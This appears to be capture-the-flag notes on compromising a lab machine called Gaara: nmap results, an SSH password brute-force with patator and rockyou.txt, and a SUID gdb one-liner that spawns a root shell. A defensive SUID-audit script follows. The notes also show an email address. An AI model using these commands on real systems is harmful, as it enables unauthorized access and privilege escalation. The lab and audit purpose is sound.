Gaara 192.168.130.142 (easy)

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
|   256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_  256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

http Apache httpd 2.4.38 ((Debian))

email dyuuwijaya@yahoo.com

dguuwijaga

Cracking the SSH password with:

patator ssh_login host=192.168.130.142 port=22 user=gaara password=FILE0 0=~/rockyou.txt persistent=0 -x ignore:mesg='Authentication failed.' 

Checking for SUID binaries:

find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.

SUID gdb gives us an instant root shell!

/usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
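From the defender's side, the same find check can be turned into an audit that flags every SUID file not on an expected baseline, which is where a SUID gdb would show up. This is an added example, not part of the original notes; the function names, the allowlist format (one absolute path per line) and the sample tree are assumptions constructed for illustration.

```shell
#!/bin/sh
# audit_suid ROOT ALLOWLIST
# Prints each SUID regular file under ROOT that is not listed in ALLOWLIST
# (one absolute path per line; lines starting with '#' are ignored).
# Returns 0 when nothing unexpected is found, 1 otherwise.
audit_suid() {
    root=$1
    allow=$2
    unexpected=$(
        find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
        while IFS= read -r path; do
            # -F fixed string, -x whole-line match, -q quiet
            if ! grep -v '^[[:space:]]*#' "$allow" | grep -Fxq -- "$path"; then
                printf '%s\n' "$path"
            fi
        done
    )
    if [ -n "$unexpected" ]; then
        printf '%s\n' "$unexpected"
        return 1
    fi
    return 0
}

# Constructed sample tree: passwd (SUID, expected), gdb (SUID, not expected),
# ls (no SUID). The files are empty placeholders, not real binaries.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/usr/bin"
    for name in passwd gdb ls; do
        : > "$t/usr/bin/$name"
    done
    chmod 4755 "$t/usr/bin/passwd" "$t/usr/bin/gdb"
    chmod 0755 "$t/usr/bin/ls"
    printf '# expected SUID binaries\n%s\n' "$t/usr/bin/passwd" > "$t/allow.txt"
    printf '%s\n' "$t"
}

# Demo run against the constructed tree; on a real host ROOT would be /
# and the allowlist would come from a known-good install of the same release.
tree=$(make_sample_tree)
audit_suid "$tree" "$tree/allow.txt" || echo "unexpected SUID files found" >&2
rm -rf "$tree"
```

The fix for a finding like the gdb one is to clear the bit (chmod u-s on the file) and re-run the audit until it returns 0.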
